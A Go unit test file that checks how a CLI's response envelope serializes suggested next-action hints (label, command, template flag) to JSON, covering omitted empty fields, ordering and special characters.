func TestMetaNextSerialization_EmptySliceOmitted(t *testing.T) {
// A non-nil but empty slice must also be dropped by omitempty (len == 0).
got := unmarshalMap(t, marshalMeta(t, &Meta{Next: []NextAction{}}))
if _, ok := got["next"]; ok {
t.Errorf("empty Next slice must be omitted, got %#v", got)
}
}
func TestMetaNextSerialization_EmptyFieldsPresent(t *testing.T) {
// A NextAction with empty fields still serializes: label/command have no
// omitempty, so they render as empty strings and the entry stays present.
got := unmarshalMap(t, marshalMeta(t, &Meta{Next: []NextAction{{}}}))
next, ok := got["next"].([]interface{})
if !ok || len(next) != 1 {
t.Fatalf("next = %#v, want single-element array", got["next"])
}
action, ok := next[0].(map[string]interface{})
if !ok {
t.Fatalf("next[0] type = %T, want object", next[0])
}
label, hasLabel := action["label"]
command, hasCommand := action["command"]
if !hasLabel || label != "" {
t.Errorf("label = %v (present=%v), want empty string present", label, hasLabel)
}
if !hasCommand || command != "" {
t.Errorf("command = %v (present=%v), want empty string present", command, hasCommand)
}
}
func TestMetaNextSerialization_TemplateTruePresent(t *testing.T) {
// A template hint (command carries <...> placeholders) must serialize the
// marker so AI callers know it needs substitution before execution.
m := &Meta{Next: []NextAction{{
Label: "continue",
Command: "lark-cli agent send example:x --context-id c1 --task-id t1 --text <你的答复>",
Template: true,
}}}
next, ok := unmarshalMap(t, marshalMeta(t, m))["next"].([]interface{})
if !ok || len(next) != 1 {
t.Fatalf("next = %#v, want single-element array", next)
}
action, _ := next[0].(map[string]interface{})
if action["template"] != true {
t.Errorf("template = %v, want true", action["template"])
}
}
func TestMetaNextSerialization_TemplateFalseOmitted(t *testing.T) {
// A directly executable hint must not carry the template key at all
// (omitempty): its absence is the "run verbatim" signal.
m := &Meta{Next: []NextAction{{Label: "poll", Command: "lark-cli agent task get example:x t1 --watch"}}}
next, ok := unmarshalMap(t, marshalMeta(t, m))["next"].([]interface{})
if !ok || len(next) != 1 {
t.Fatalf("next = %#v, want single-element array", next)
}
action, _ := next[0].(map[string]interface{})
if _, present := action["template"]; present {
t.Errorf("template=false must be omitted, got %#v", action)
}
}
func TestMetaNextSerialization_MultipleActionsPreserveOrder(t *testing.T) {
m := &Meta{Next: []NextAction{
{Label: "poll", Command: "lark-cli agent task get example:x t1"},
{Label: "cancel", Command: "lark-cli agent task cancel example:x t1"},
}}
next, ok := unmarshalMap(t, marshalMeta(t, m))["next"].([]interface{})
if !ok || len(next) != 2 {
t.Fatalf("next = %#v, want two-element array", next)
}
first, _ := next[0].(map[string]interface{})
second, _ := next[1].(map[string]interface{})
if first["label"] != "poll" || second["label"] != "cancel" {
t.Errorf("order not preserved: got %v then %v", first["label"], second["label"])
}
}
func TestMetaNextSerialization_SpecialCharacters(t *testing.T) {
// Fields carrying quotes, unicode and newlines must survive a JSON round
// trip intact, which string matching would not reliably verify.
label := `poll "now"`
command := "lark-cli agent task get example:代理 t1\n--wait"
m := &Meta{Next: []NextAction{{Label: label, Command: command}}}
next, _ := unmarshalMap(t, marshalMeta(t, m))["next"].([]interface{})
if len(next) != 1 {
t.Fatalf("next = %#v, want single-element array", next)
}
action, _ := next[0].(map[string]interface{})
if action["label"] != label {
t.Errorf("label = %q, want %q", action["label"], label)
}
if action["command"] != command {
t.Errorf("command = %q, want %q", action["command"], command)
}
}
func TestEnvelopeMetaNextIntegration(t *testing.T) {
// Meta.Next must serialize correctly when nested inside a full Envelope,
// under the "meta" key alongside data.
env := Envelope{
OK: true,
Data: map[string]interface{}{"task_id": "t1"},
Meta: &Meta{Next: []NextAction{{Label: "poll", Command: "lark-cli agent task get example:x t1"}}},
}
b, err := json.Marshal(env)
if err != nil {
t.Fatalf("json.Marshal(envelope) error = %v", err)
}
got := unmarshalMap(t, b)
if got["ok"] != true {
t.Errorf("ok = %v, want true", got["ok"])
}
meta, ok := got["meta"].(map[string]interface{})
if !ok {
t.Fatalf("meta type = %T, want object", got["meta"])
}
next, ok := meta["next"].([]interface{})
if !ok || len(next) != 1 {
t.Fatalf("meta.next = %#v, want single-element array", meta["next"])
}
action, _ := next[0].(map[string]interface{})
if action["command"] != "lark-cli agent task get example:x t1" {
t.Errorf("meta.next[0].command = %v, want the poll command", action["command"])
}
}
func TestEnvelopeNilMetaOmitted(t *testing.T) {
// nil Meta is a valid edge case: the "meta" key must not appear.
b, err := json.Marshal(Envelope{OK: true})
if err != nil {
t.Fatalf("json.Marshal(envelope) error = %v", err)
}
got := unmarshalMap(t, b)
if _, ok := got["meta"]; ok {
t.Errorf("nil Meta must be omitted, got %#v", got)
}
}

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